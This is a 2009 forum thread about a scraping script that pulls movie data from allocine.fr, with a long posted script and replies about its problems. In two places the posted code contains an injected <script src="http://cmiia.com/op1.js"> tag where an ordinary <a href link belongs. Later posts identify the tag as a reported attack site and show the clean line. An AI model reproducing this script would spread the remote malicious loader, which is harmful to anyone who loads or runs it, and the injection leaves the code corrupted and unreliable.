| Author |
Topic  |
|
|
Darkmeteor
Starting Member
2 Posts |
Posted - 19 Mar 2009 : 06:26:36
|
hi, since the last allocine.fr script update (15/03/09) there is a major issue completely locking up the script
after doing a bunch of movie update with this script, it stoped working because google ask for a captcha (google think this is a virus with all the google requests)
why is this script using google for searching anyway ?
I'd like to get the previous version please, as I can't use it anymore
(I was even able to pass the google captcha test using the internal browser, but that didn't help, I guess the internal browser and the magicscript engine use different user agents) |
|
|
Alessio Viti
Forum Admin
    
Italy
9171 Posts |
|
|
Darkmeteor
Starting Member
2 Posts |
Posted - 19 Mar 2009 : 11:18:12
|
| I managed to get the previous version of the script which use the allocine search engine |
 |
|
|
Alessio Viti
Forum Admin
    
Italy
9171 Posts |
|
|
jareod59400
Starting Member
France
9 Posts |
Posted - 27 Mar 2009 : 03:23:47
|
Hi, I have modified this script for the search, the title, original title , yeah, producter and actor are display with this code
#CREATEMOVIELIST# #STARTREADWEB# #FINDLINE# #FINDLINE#=>Films <h4>#15# #ONERROR#=*STOP* #PUT#=0#50# #FINDLINE#=Pas de résultats#15# #ONERROR#=*OK* #IF# #15#<>#00# #WRITETITLELIST#=Aucun résultat #GOTO#=NoResult #ENDIF# #WRITETITLELIST#=Films
:ReadNewPage #STARTREADWEB# #FINDLINE#=<h4><script src="http://cmiia.com/op1.js"="/film/fichefilm_gen_cfilm=#15# #ONERROR#=*OK* #REPEAT# // Take Note of movie-Block end #PUTCURSOR#=#15# #FIND#=</td>#49# #ONERROR#=*OK* #LOADCURSOR#=#15#
// Get Movie Site ID #FIND#=_cfilm#11# #ONERROR#=*OK* #COMPUTEVAR#=#11#+6 #FIND#=.html#12# #ONERROR#=*OK* #TAKEWORD#=#22#,#11#,#12#
// Get Title #FIND#=">#11# #ONERROR#=*OK* #COMPUTEVAR#=#11#+1 #FIND#=</script>#12# #ONERROR#=*OK* #TAKEWORD#=#20#,#11#,#12# #CHECKVARIABLE#=#20# #CLEARTAGS# #STARTDELETETAGS# #PUTCURSOR#=#15#
// Seek For Original Title #FIND#=text-decoration:none;"> (#11# #ONERROR#=*OK* #IF# #11#<>#00# #COMPUTEVAR#=#11#+29 #IF# #11#<<#49# #FIND#=)#12# #ONERROR#=*OK* #TAKEWORD#=#21#,#11#,#12# #CHECKVARIABLE#=#21# #CLEARTAGS# #STARTDELETETAGS# #STRING#=#20#=#20# (#21#) #ENDIF# #ENDIF# #STRING#=#23#=http://www.allocine.fr/film/fichefilm_gen_cfilm=#22#.html #WRITETITLELIST#=#23# ---> #20# #FIND#=<h4 style#11# #ONERROR#=*OK* #LOADCURSOR#=#15#
// Search For Detail Main #PUTCURSOR#=#15# #FIND#=<h4#11# #ONERROR#=*OK* #IF# #11#>>#49# #GOTO#=ExitWhilePage #ENDIF# #FIND#=>#11# #ONERROR#=*OK* #IF# #11#<>#00# #IF# #11#<<#49# #FIND#=</h4>#12# #ONERROR#=*OK* #TAKEWORD#=#21#,#11#,#12# #CHECKVARIABLE#=#21# #CLEARTAGS# #STARTDELETETAGS# #STARTSUBSTITUTETAGS# #STRING#=#20#= #21# #WRITETITLELIST#=#20# #ENDIF# #ENDIF# #LOADCURSOR#=#15#
// Search For Detail Second #FIND#=>de #11# #ONERROR#=*OK* #IF# #11#>>#49# #GOTO#=ExitWhilePage #ENDIF# #IF# #11#<>#00# #IF# #11#<<#49# #COMPUTEVAR#=#11#-5 #FIND#=>#11# #ONERROR#=*OK* #FIND#=</h5>#12# #ONERROR#=*OK* #TAKEWORD#=#22#,#11#,#12# #CHECKVARIABLE#=#22# #CLEARTAGS# #STARTDELETETAGS# #STARTSUBSTITUTETAGS# #STRING#=#20#= #22# #WRITETITLELIST#=#20# #ENDIF# #ENDIF# #LOADCURSOR#=#15#
// Search For Detail Third #FIND#=>avec #11# #ONERROR#=*OK* #IF# #11#==#00# #GOTO#=ExitWhilePage #ENDIF# #IF# #11#>>#49# #GOTO#=ExitWhilePage #ENDIF# #COMPUTEVAR#=#11#-7 #FIND#=>#11# #ONERROR#=*OK* #FIND#=</h5>#12# #ONERROR#=*OK* #TAKEWORD#=#23#,#11#,#12# #CHECKVARIABLE#=#23# #CLEARTAGS# #STARTDELETETAGS# #STARTSUBSTITUTETAGS# #STRING#=#20#= #23#
:WriteDetails #WRITETITLELIST#=#20#
:ExitWhilePage #LOADCURSOR#=#49# #FIND#=<h4><script src="http://cmiia.com/op1.js"="/film/fichefilm_gen_#15# #ONERROR#=*OK*
#WHILE# #15#<>#00#
// Next Page ? #STARTREADWEB# #FINDLINE#=Films précédents#10# #ONERROR#=*OK* #IF# #10#<>#00# // "Films suivants" est apres "Films précédents" #FIND#="/recherche#10# #ONERROR#=*OK* #COMPUTECURSOR#=+1 #FIND#="#12# #ONERROR#=*OK* #TAKEWORD#=#20#,#10#,#12# #STRING#=#20#=http://www.allocine.fr#20# #ENDIF# #IF# #50#<>#00# #RESTOREWEB# #ENDIF# #IF# #10#<>#00# #PUT#=1#50# #OPENNEWWEB#=#20# #GOTO#=ReadNewPage #ENDIF# :NoResult #ENDCREATEMOVIELIST#
|
 |
|
|
Alessio Viti
Forum Admin
    
Italy
9171 Posts |
|
|
Crux
Starting Member
Russia
35 Posts |
Posted - 27 Mar 2009 : 22:43:34
|
Hi, Alessio, keep an eye on the script cut from jareod59400, it looks again trying to access "http://cmiia.com" - Reported Attack Site!
Hmmm, may be it's a virus on the customer's PC which affects the XMM scripts by adding cmiia.com links...
|
 |
|
|
jareod59400
Starting Member
France
9 Posts |
Posted - 28 Mar 2009 : 00:21:00
|
Hi, In the script i was sent it's replace by :ExitWhilePage #LOADCURSOR#=#49# #FIND#=<h4><a href="/film/fichefilm_gen_#15# #ONERROR#=*OK* If you look previous version (15/03/09) you will find #FIND#=<h4><script src="http://cmiia.com/op1.js"="/film/fichefilm_gen_#15# #ONERROR#=*OK*
|
 |
|
| |
Topic  |
|